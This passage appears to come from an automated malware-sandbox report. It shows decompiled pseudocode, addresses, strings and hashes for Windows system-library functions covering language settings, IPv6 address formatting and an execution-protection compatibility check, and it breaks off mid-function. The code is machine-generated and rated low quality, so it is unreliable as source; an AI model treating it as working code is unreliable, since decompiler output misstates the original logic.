					_v8 = _t318;
					E025B718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E025B8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E025B718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E025B8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E025B8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E025B8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E025B718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02592340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E025AE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0259E2A8(_t322,  &_v68, _v16);
								if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E025AE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0259E2A8(_t322,  &_v68, _t236);
								if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E025B718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02592340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E025AE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0259E2A8(_v12,  &_v68, _v16);
							if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E025AE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0259E2A8(_t322,  &_v68, _t269);
							if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E025B718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02592340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E025AE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0259E2A8(_v12,  &_v68, _v16);
						if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E025AE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0259E2A8(_t322,  &_v68, _t296);
						if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x025b8788
0x025b8788
0x025b8791
0x025b8794
0x025b8798
0x025b879b
0x025b879e
0x025b87a1
0x025b87a4
0x025b87a7
0x025b87aa
0x025b87af
0x02601ad3
0x025b8b0a
0x025b8b0d
0x025b8b13
0x025b8b19
0x025b8b1f
0x025b8b25
0x025b8b2b
0x025b8b31
0x025b8b37
0x025b8b3d
0x025b8b46
0x025b8b46
0x025b87c6
0x025b87d0
0x02601ae0
0x02601ae6
0x02601af8
0x02601af8
0x02601afd
0x02601afe
0x02601b01
0x02601b06
0x02601b06
0x025b87d6
0x025b87f2
0x025b87f7
0x025b8807
0x025b880a
0x025b880f
0x025b8810
0x025b8813
0x025b8818
0x025b8818
0x025b882c
0x025b8831
0x025b8838
0x025b8908
0x025b8920
0x025b89f0
0x025b8a08
0x025b8af6
0x025b8af6
0x025b8af8
0x025b8afb
0x02601beb
0x02601beb
0x025b8b04
0x02601bf8
0x02601c0e
0x02601c13
0x02601c16
0x02601c16
0x02601bf8
0x00000000
0x025b8b04
0x025b8a0e
0x025b8a11
0x025b8a14
0x025b8a15
0x025b8a18
0x025b8a22
0x025b8b59
0x025b8a28
0x025b8a3c
0x025b8a3c
0x025b8a42
0x02601bb0
0x02601b11
0x02601b11
0x00000000
0x025b8a48
0x025b8a51
0x025b8a5b
0x025b8a5e
0x025b8a61
0x025b8a69
0x025b8a69
0x025b8a6d
0x00000000
0x00000000
0x025b8a74
0x025b8a7c
0x025b8a7d
0x025b8a91
0x025b8a93
0x025b8a93
0x025b8a98
0x025b8a9b
0x025b8aa1
0x025b8aa1
0x025b8aa4
0x025b8aaa
0x025b8ab1
0x025b8ac5
0x025b8ac7
0x025b8ac7
0x025b8ac5
0x025b8ace
0x02601bc9
0x02601bce
0x02601bd2
0x02601bd2
0x025b8ad8
0x025b8aeb
0x025b8aeb
0x025b8af0
0x025b8af4
0x00000000
0x025b8af4
0x025b8a42
0x025b8926
0x025b8929
0x025b892c
0x025b892d
0x025b8930
0x025b8935
0x025b893a
0x025b8b51
0x025b8940
0x025b8954
0x025b8954
0x025b895a
0x02601b63
0x00000000
0x025b8960
0x025b8969
0x025b8973
0x025b8976
0x025b8979
0x025b897e
0x025b8981
0x025b8981
0x025b8986
0x00000000
0x00000000
0x02601b6e
0x02601b74
0x02601b7b
0x02601b8f
0x02601b91
0x02601b91
0x02601b99
0x02601b9c
0x02601ba2
0x02601ba2
0x025b898c
0x025b8992
0x025b8999
0x025b89ad
0x02601ba8
0x02601ba8
0x025b89ad
0x025b89b6
0x025b89c8
0x025b89cd
0x025b89d0
0x025b89d0
0x025b89d6
0x025b89e8
0x025b89e8
0x025b89ed
0x00000000
0x025b89ed
0x025b895a
0x025b883e
0x025b8841
0x025b8844
0x025b8845
0x025b8848
0x025b884d
0x025b8852
0x025b8b49
0x025b8858
0x025b886c
0x025b886c
0x025b8872
0x02601b0e
0x00000000
0x025b8878
0x025b8881
0x025b888b
0x025b888e
0x025b8891
0x025b8896
0x025b8899
0x025b8899
0x025b889e
0x00000000
0x00000000
0x02601b21
0x02601b27
0x02601b2e
0x02601b42
0x02601b44
0x02601b44
0x02601b4c
0x02601b4f
0x02601b55
0x02601b55
0x025b88a4
0x025b88aa
0x025b88b1
0x025b88c5
0x02601b5b
0x02601b5b
0x025b88c5
0x025b88ce
0x025b88e0
0x025b88e5
0x025b88e8
0x025b88e8
0x025b88ee
0x025b8900
0x025b8900
0x025b8905
0x00000000
0x025b8905

APIs

_wcspbrk.LIBCMT ref: 025B8891
_wcspbrk.LIBCMT ref: 025B8979
_wcspbrk.LIBCMT ref: 025B8A61
_wcspbrk.LIBCMT ref: 025B8A9B
_wcspbrk.LIBCMT ref: 02601B9C

Strings

Kernel-MUI-Language-SKU, xrefs: 025B89FC
WindowsExcludedProcs, xrefs: 025B87C1
Kernel-MUI-Language-Allowed, xrefs: 025B8827
Kernel-MUI-Language-Disallowed, xrefs: 025B8914
Kernel-MUI-Number-Allowed, xrefs: 025B87E6

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: c18dc0fc56fb19ac12e599fb4641d75fc57925eda29392d40a7628e04c8b00a6
Instruction ID: 48a7cfda28b5eb284bd86bec5e6f5d5a0913c5f28c6ee7c76abfc13b14a5ff61
Opcode Fuzzy Hash: c18dc0fc56fb19ac12e599fb4641d75fc57925eda29392d40a7628e04c8b00a6
Instruction Fuzzy Hash: 77F1F9B2D00209EFCF11DF98C985AEEBBB9FF48304F14546AE505A7250E7349A45DF64

Uniqueness

Uniqueness Score: -1.00%

Function 025D13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E025D13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E025C7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2592926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E025C7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2599cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E025C7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E025C7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E025C7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E025C7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x025d13d5
0x025d13d9
0x025d13dc
0x025d13de
0x025d13e1
0x025d13e8
0x025d13ee
0x025fe8fd
0x00000000
0x025fe921
0x025fe921
0x025fe928
0x025fe982
0x025fe98a
0x00000000
0x025fe99a
0x025fe99e
0x025fe9a3
0x025fe9a8
0x025fe9b9
0x025fe978
0x00000000
0x025fe978
0x025fe98a
0x025fe92a
0x025fe931
0x025fe944
0x025fe944
0x025fe950
0x025fe954
0x025fe959
0x025fe95e
0x025fe963
0x025fe970
0x00000000
0x025fe975
0x025fe93b
0x025fe980
0x00000000
0x025fe980
0x025fe942
0x025fe94b
0x00000000
0x025fe94b
0x00000000
0x025fe942
0x025d13f4
0x025d13f4
0x025d13f9
0x025d13fc
0x025d13ff
0x025d1406
0x025fe9cc
0x025fe9d2
0x025fe9d2
0x025fe9cc
0x025d140c
0x025d1411
0x025d1431
0x025d143a
0x025d143c
0x025d143f
0x025d143f
0x025d1442
0x025d1447
0x025d14a8
0x025d14ac
0x025fe9e2
0x025fe9e7
0x025fe9ec
0x025fea05
0x025fea05
0x00000000
0x025d1449
0x00000000
0x025d1449
0x025d144c
0x025d1459
0x025d1462
0x025d1469
0x025d146a
0x025d1470
0x025d1473
0x025d1476
0x025d1476
0x025d1490
0x025d1495
0x025d138e
0x025d1390
0x025d1397
0x025d1398
0x025d1399
0x025d13a1
0x025d13a4
0x025d13a4
0x025d1498
0x025d149c
0x025d149f
0x025d14a2
0x00000000
0x00000000
0x025d14a4
0x00000000
0x025d14a4
0x025d1413
0x025d1415
0x025d1416
0x025d1419
0x025d141c
0x025d1422
0x025d13b7
0x025d13bc
0x025d13bf
0x025d13bf
0x025d13c2
0x025d1424
0x025d1424
0x025d1424
0x025d1427
0x025d142b
0x025d142c
0x025d142c
0x025d142c
0x00000000
0x025d141c
0x025d1411

APIs

___swprintf_l.LIBCMT ref: 025D146B
___swprintf_l.LIBCMT ref: 025D1490
___swprintf_l.LIBCMT ref: 025FE970

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 025FE9B0
ffff:, xrefs: 025FE94B
:%u.%u.%u.%u, xrefs: 025FE9F4
::%hs%u.%u.%u.%u, xrefs: 025FE967

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: af00593a3585537e40e099d5214638b9204e0096a9a688a8724429d6cd2f1b12
Instruction ID: 6d5766b2b32a0f4400b6704f703a9caa6e3736b187264bb8becfd9a5303c7972
Opcode Fuzzy Hash: af00593a3585537e40e099d5214638b9204e0096a9a688a8724429d6cd2f1b12
Instruction Fuzzy Hash: 946105B1900A56AADF34DFADC9809BEBFB6FF84300754C52DE59A47540D334A640CB68

Uniqueness

Uniqueness Score: -1.00%

Function 025C7EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E025C7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2672088; // 0x77fdf0e4
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E025C7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E025E3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0259DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2674218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E025E3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = L025A0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E025E3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E025A8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E025E3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0260E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E025E3F92();
					_t38 = 1;
					L2:
					return E0259E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x025c7f08
0x025c7f0f
0x025c7f12
0x025c7f1b
0x025c7f31
0x025e3ead
0x025e3eb4
0x00000000
0x00000000
0x025e3eba
0x025e3ecd
0x025e3ed2
0x025e3ee1
0x025e3ee7
0x025e3eec
0x025e3f12
0x025e3f18
0x025e3f1a
0x00000000
0x00000000
0x025e3f20
0x025e3f26
0x025e3f28
0x00000000
0x00000000
0x025e3f2e
0x025e3f30
0x00000000
0x00000000
0x025e3f3a
0x025e3f3b
0x025e3f53
0x025e3f64
0x025e3f69
0x025e3f6c
0x025e3f6d
0x025e3f6f
0x025ee304
0x025ee30f
0x025ee315
0x025ee31e
0x025ee321
0x025ee327
0x025ee329
0x00000000
0x00000000
0x00000000
0x00000000
0x025ee32f
0x025ee32f
0x025ee337
0x025ee33a
0x025ee33b
0x025ee33d
0x025ee33f
0x025ee341
0x025ee341
0x025ee34e
0x025ee353
0x025ee358
0x025ee35d
0x025ee35f
0x00000000
0x00000000
0x025ee365
0x025ee365
0x025ee368
0x025ee36e
0x00000000
0x00000000
0x025ee374
0x025ee32f
0x025e3f75
0x025e3f7a
0x025e3f7c
0x025e3f7e
0x025e3f86
0x025c7f39
0x025c7f47
0x025c7f47
0x025c7f37
0x025c7f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 025E3F12

Strings

Execute=1, xrefs: 025E3F5E
&q, xrefs: 025C7F1E
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 025E3EC4
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 025E3F4A
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 025EE2FB
CLIENT(ntdll): Processing section info %ws..., xrefs: 025EE345
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 025E3F75
ExecuteOptions, xrefs: 025E3F04

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$&q
API String ID: 3901378454-4097024812
Opcode ID: 5a42875e6b306f1d3faedce7fca214e7b41ba9fee36307dca22d3883ccbee2dc
Instruction ID: 3b822689b25480092df294637efd8dee6125b0289cc140f5ac885a91bfd36f44
Opcode Fuzzy Hash: 5a42875e6b306f1d3faedce7fca214e7b41ba9fee36307dca22d3883ccbee2dc
Instruction Fuzzy Hash: 1541BB7164031D7AEF24DAA4DCC5FEAB3BDBB58704F100499A505E6080F7709A458F69

Uniqueness

Uniqueness Score: -1.00%

Function 025D0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E025D0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E025A8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0259DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E025D0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E025D0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E025D06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E025D06BA(_t135, _t178) == 0 || E025D0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E025D0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E025D0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
